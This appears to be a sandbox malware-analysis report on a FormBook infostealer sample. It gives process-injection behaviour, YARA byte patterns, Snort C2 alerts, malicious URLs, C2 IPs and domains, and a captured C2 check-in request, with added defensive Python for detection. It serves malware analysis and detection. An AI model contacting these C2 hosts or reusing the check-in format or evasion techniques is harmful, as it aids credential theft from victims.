
Windows Analysis Report
Electronic Order.exe

Overview

General Information

Sample name: Electronic Order.exe
Analysis ID: 1471496
MD5: f44d956aa3a0c41f8e8ca7d9e9ead69c
SHA1: 5d4cd96731237a1d8a8e03aa078b0bda9d2296a3
SHA256: 48bae1515ac732f33a6fbd725dfb29fe55132b1f446f0efa201c1ad10cf0b1f6
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Electronic Order.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\Electronic Order.exe" MD5: F44D956AA3A0C41F8E8CA7D9E9EAD69C)
    • svchost.exe (PID: 964 cmdline: "C:\Users\user\Desktop\Electronic Order.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • BSPmWtBGjJwku.exe (PID: 1008 cmdline: "C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sfc.exe (PID: 64 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
          • BSPmWtBGjJwku.exe (PID: 6784 cmdline: "C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
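
The tree above is the detection opportunity in this report: the loader (PID 7144) starts a 32-bit svchost.exe (PID 964) whose recorded command line is the loader's own path rather than anything svchost-like, which is what a process created suspended and overwritten from the parent looks like in process-creation telemetry (the "Creates a process in suspended mode", "Writes to foreign memory regions" and "Modifies the context of a thread in another process" signatures above describe the same thing from the API side), and it is what the Sigma "Uncommon Svchost Parent Process" hit in the System Summary keys on. The Python below is an added example, not part of the Joe Sandbox report or the Sigma rule, that runs two such checks over process-creation events constructed from this tree: an allow-list of svchost.exe parents (an approximation of the Sigma rule's filter, assumed here) and a mismatch between the executable named in the command line and the image on disk. The parent of PID 7144 is not shown in the report, so it is recorded as unknown.

```python
import ntpath

# Constructed process-creation events that mirror the report's process tree.
# Image paths, PIDs and command lines are copied from the report; the parent of
# PID 7144 is not shown there, so it is recorded as unknown (ppid=0).
EVENTS = [
    {"pid": 7144, "ppid": 0,
     "image": r"C:\Users\user\Desktop\Electronic Order.exe",
     "cmdline": r'"C:\Users\user\Desktop\Electronic Order.exe"'},
    {"pid": 964, "ppid": 7144,
     "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\Electronic Order.exe"'},
    {"pid": 1008, "ppid": 964,
     "image": r"C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe",
     "cmdline": r'"C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe"'},
    {"pid": 64, "ppid": 1008,
     "image": r"C:\Windows\SysWOW64\sfc.exe",
     "cmdline": r'"C:\Windows\SysWOW64\sfc.exe"'},
    {"pid": 6784, "ppid": 64,
     "image": r"C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe",
     "cmdline": r'"C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe"'},
    {"pid": 2020, "ppid": 64,
     "image": r"C:\Program Files\Mozilla Firefox\Firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
]

# Parents from which svchost.exe is normally started. This allow-list is an
# approximation of the filter in the Sigma rule cited by the report (assumption).
EXPECTED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}


def exe_from_cmdline(cmdline):
    """Return the executable token of a Windows command line, quoted or not."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(None, 1)[0] if s else ""


def findings_for(events):
    """Apply both checks to every event and return (pid, rule-name) tuples."""
    by_pid = {e["pid"]: e for e in events}
    out = []
    for e in events:
        image = ntpath.basename(e["image"]).lower()
        parent = by_pid.get(e["ppid"])
        parent_name = ntpath.basename(parent["image"]).lower() if parent else ""
        # Check 1: svchost.exe started by something other than the service control manager
        # (or the few other expected parents). An unknown parent also trips this check.
        if image == "svchost.exe" and parent_name not in EXPECTED_SVCHOST_PARENTS:
            out.append((e["pid"], "uncommon_svchost_parent"))
        # Check 2: the command line names a different executable than the image on disk.
        # A process whose image was replaced after a suspended start keeps the command
        # line it was created with, which is exactly what PID 964 shows in the tree.
        if ntpath.normcase(exe_from_cmdline(e["cmdline"])) != ntpath.normcase(e["image"]):
            out.append((e["pid"], "cmdline_image_mismatch"))
    return out


if __name__ == "__main__":
    for pid, rule in findings_for(EVENTS):
        print(f"PID {pid}: {rule}")
```

Only PID 964 trips either check; the later system binary (sfc.exe, PID 64) is launched with its own path as command line, so the mismatch check is silent there and hunting for that hop needs a different signal, such as a SysWOW64 binary whose parent lives under a randomly named Program Files (x86) directory.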
Yara matches in memory dumps (Source | Rule | Description | Author | Strings):
00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2b6b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2b6b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(the report lists 9 entries in this table; the remaining ones are not shown on this page)

Yara matches in unpacked PE files (Source | Rule | Description | Author | Strings):
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2dca3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x167f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2eaa3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x175f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
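
The string hits above are two byte patterns from the Windows_Trojan_Formbook_1112e116 rule, reported at one offset in the mapped view of the injected image (.unpack) and at a different one in the raw-layout view (.raw.unpack); for both strings the two offsets differ by the same 0xE00 bytes, which is what a pure section-layout difference between the two views produces. The Python below is an added example, not YARA and not Joe Sandbox code, that converts YARA-style hex strings into a bytes regex (with ?? as a one-byte wildcard), scans a buffer for them and reports overlapping hits the way YARA does, and reproduces that constant shift on a constructed image: a zero-filled buffer with the two strings written at the reported .unpack offsets, and a second copy with 0xE00 bytes of padding inserted ahead of them. That padding is an assumption used to model the raw layout; nothing else from the real dump is reproduced.

```python
import re

# String hits reported above for Windows_Trojan_Formbook_1112e116 (copied from the report).
PATTERNS = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}
# Offsets the report gives for the mapped view (2.2.svchost.exe.400000.0.unpack).
UNPACK_OFFSETS = {"$a2": 0x2DCA3, "$a3": 0x167F2}


def hex_string_to_regex(spec):
    """Compile a YARA-style hex string into a bytes regex. '??' becomes a one-byte wildcard;
    the lookahead wrapper lets finditer report overlapping hits, as YARA does."""
    body = b"".join(b"." if tok == "??" else b"\\x%02x" % int(tok, 16) for tok in spec.split())
    return re.compile(b"(?=" + body + b")", re.DOTALL)


def scan(buf, patterns):
    """Return {name: [offsets]} for every occurrence of every pattern in buf."""
    return {name: [m.start() for m in hex_string_to_regex(spec).finditer(buf)]
            for name, spec in patterns.items()}


def build_mapped_image(size=0x30000):
    """Constructed stand-in for the .unpack dump: zero-filled, with the two strings written
    at the offsets the report lists for that view."""
    img = bytearray(size)
    for name, off in UNPACK_OFFSETS.items():
        pat = bytes.fromhex(PATTERNS[name].replace(" ", ""))
        img[off:off + len(pat)] = pat
    return bytes(img)


def as_raw_layout(mapped, insert_at=0x1000, slack=0xE00):
    """Model the raw-file layout by inserting `slack` bytes of padding ahead of the code.
    Assumption: a single uniform shift, which is what the report's two offset pairs show."""
    return mapped[:insert_at] + b"\x00" * slack + mapped[insert_at:]


def offset_shift(hits_a, hits_b):
    """Per-string offset differences between two scans; a single value means the two views
    differ only by layout, not by content."""
    return {hits_b[n][0] - hits_a[n][0] for n in hits_a if hits_a[n] and hits_b[n]}


if __name__ == "__main__":
    mapped = build_mapped_image()
    raw = as_raw_layout(mapped)
    m_hits, r_hits = scan(mapped, PATTERNS), scan(raw, PATTERNS)
    print("unpack     :", {k: [hex(o) for o in v] for k, v in m_hits.items()})
    print("raw.unpack :", {k: [hex(o) for o in v] for k, v in r_hits.items()})
    print("shift      :", [hex(d) for d in offset_shift(m_hits, r_hits)])
```

When triaging a real dump, feed the bytes of the .unpack or .raw.unpack file to scan() and compare against the offsets in the table; a hit at the expected offset in the mapped view but not in the raw one usually means the string sits in a section whose raw and virtual sizes differ, not that the rule missed. This matcher covers only whole-byte wildcards; nibble wildcards and jumps from the YARA syntax are not implemented.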

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\Electronic Order.exe", CommandLine: "C:\Users\user\Desktop\Electronic Order.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Electronic Order.exe", ParentImage: C:\Users\user\Desktop\Electronic Order.exe, ParentProcessId: 7144, ParentProcessName: Electronic Order.exe, ProcessCommandLine: "C:\Users\user\Desktop\Electronic Order.exe", ProcessId: 964, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\Electronic Order.exe", CommandLine: "C:\Users\user\Desktop\Electronic Order.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Electronic Order.exe", ParentImage: C:\Users\user\Desktop\Electronic Order.exe, ParentProcessId: 7144, ParentProcessName: Electronic Order.exe, ProcessCommandLine: "C:\Users\user\Desktop\Electronic Order.exe", ProcessId: 964, ProcessName: svchost.exe
Snort IDS alerts, in chronological order (Timestamp | SID | Source Port | Destination Port | Protocol | Classtype):
07/11/24-15:05:38.936362 | 2855465 | 49718 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:00.490458 | 2855464 | 49721 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:03.503858 | 2855464 | 49722 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:09.188758 | 2855465 | 49725 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:16.735802 | 2855464 | 49727 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:19.325666 | 2855464 | 49728 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:24.480321 | 2855465 | 49730 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:32.631655 | 2855464 | 49732 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:35.210818 | 2855464 | 49733 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:40.341512 | 2855465 | 49735 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:46.273374 | 2855464 | 49736 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:48.845266 | 2855464 | 49737 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:53.999548 | 2855465 | 49739 | 80 | TCP | A Network Trojan was detected
07/11/24-15:06:59.761285 | 2855464 | 49740 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:02.361687 | 2855464 | 49741 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:07.976080 | 2855465 | 49743 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:14.913315 | 2855464 | 49745 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:17.488664 | 2855464 | 49746 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:22.659611 | 2855465 | 49748 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:30.927773 | 2855464 | 49749 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:33.501313 | 2855464 | 49750 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:38.871550 | 2855465 | 49752 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:45.121444 | 2855464 | 49753 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:47.687248 | 2855464 | 49754 | 80 | TCP | A Network Trojan was detected
07/11/24-15:07:52.855523 | 2855465 | 49756 | 80 | TCP | A Network Trojan was detected
SID 2855464 is ETPRO TROJAN FormBook CnC Checkin (POST) M3 and SID 2855465 is ETPRO TROJAN FormBook CnC Checkin (GET) M2 (see the Networking section for the destination of each connection); the alerts come in groups of two POSTs followed by one GET per C2 host.

AV Detection

Source: http://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK87Qltir3slpfPozUvsqGQgAfOSyHKAppI3MtD1Vl5l86WUTbGvYQ=&GX=iP9xCL; Avira URL Cloud: Label: malware
Source: http://www.xn72dkd7scx.shop/emnz/; Avira URL Cloud: Label: malware
Source: https://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs; Avira URL Cloud: Label: malware
Source: Electronic Order.exe; ReversingLabs: Detection: 50%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: Electronic Order.exe; Joe Sandbox ML: detected
Source: Electronic Order.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb; source: BSPmWtBGjJwku.exe, 00000005.00000000.2308549836.000000000087E000.00000002.00000001.01000000.00000005.sdmp, BSPmWtBGjJwku.exe, 00000009.00000000.2557513223.000000000087E000.00000002.00000001.01000000.00000005.sdmp
Note: this PDB path belongs to Joe Sandbox's own FakeChrome decoy program and is found in the image of the BSPmWtBGjJwku.exe process. BSPmWtBGjJwku.exe (MD5 32B8AD6ECA9094891E792631BAEA9717) is therefore a renamed copy of a program that was already present in the analysis environment, placed under a randomly named directory in Program Files (x86), not a file delivered by the sample; its hash is an artifact of this sandbox and not a transferable indicator, whereas the random directory and file name pattern is the behaviour worth hunting for.
Source: Binary string: wntdll.pdbUGP; source: Electronic Order.exe, 00000000.00000003.2120952342.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, Electronic Order.exe, 00000000.00000003.2118802233.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2195945105.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203602053.0000000003300000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2399169614.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2389630955.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.0000000003150000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: Electronic Order.exe, 00000000.00000003.2120952342.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, Electronic Order.exe, 00000000.00000003.2118802233.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2389297645.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2195945105.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2389297645.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2203602053.0000000003300000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, sfc.exe, 00000007.00000003.2399169614.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000007.00000003.2389630955.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959223144.0000000003150000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: sfc.pdb; source: svchost.exe, 00000002.00000003.2357574696.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357425251.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000002.3958315142.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdbGCTL; source: svchost.exe, 00000002.00000003.2357574696.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357425251.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000002.3958315142.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Electronic Order.exe; Code function: 0_2_00E24696 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Electronic Order.exe; Code function: 0_2_00E2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\Electronic Order.exe; Code function: 0_2_00E2C93C FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Electronic Order.exe; Code function: 0_2_00E2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Electronic Order.exe; Code function: 0_2_00E2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Electronic Order.exe; Code function: 0_2_00E2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Electronic Order.exe; Code function: 0_2_00E23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Electronic Order.exe; Code function: 0_2_00E23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Electronic Order.exe; Code function: 0_2_00E2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\sfc.exe; Code function: 7_2_0074C1A0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\sfc.exe; Code function: 7_2_00739C20: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\sfc.exe; Code function: 7_2_007423C3: 4x nop then pop edi
Source: C:\Windows\SysWOW64\sfc.exe; Code function: 7_2_02FA04DF: 4x nop then mov ebx, 00000004h

Networking

Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49718 -> 142.250.186.115:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49721 -> 103.42.108.46:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49722 -> 103.42.108.46:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49725 -> 103.42.108.46:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49727 -> 188.114.97.3:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49728 -> 188.114.97.3:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49730 -> 188.114.97.3:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49732 -> 134.122.138.60:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49733 -> 134.122.138.60:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49735 -> 134.122.138.60:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49736 -> 35.212.86.52:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49737 -> 35.212.86.52:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49739 -> 35.212.86.52:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49740 -> 188.114.96.3:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49741 -> 188.114.96.3:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49743 -> 188.114.96.3:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49745 -> 188.114.97.3:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49746 -> 188.114.97.3:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49748 -> 188.114.97.3:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49749 -> 154.222.238.52:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49750 -> 154.222.238.52:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49752 -> 154.222.238.52:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49753 -> 162.254.38.56:80
Source: Traffic; Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49754 -> 162.254.38.56:80
Source: Traffic; Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49756 -> 162.254.38.56:80
Source: DNS query: www.u9games.xyz
Source: DNS query: www.globaltrend.xyz
Source: DNS query: www.ffi07s.xyz
Source: DNS query: www.j51a.xyz (queried 3 times)
Source: Joe Sandbox View; IP Address: 188.114.97.3 (2 entries)
Source: Joe Sandbox View; IP Address: 188.114.96.3 (2 entries)
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS (2 entries)
Source: Joe Sandbox View; ASN Name: VPSQUANUS
Source: Joe Sandbox View; ASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: C:\Users\user\Desktop\Electronic Order.exe; Code function: 0_2_00E325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic; HTTP traffic detected:
GET /5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw=&GX=iP9xCL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
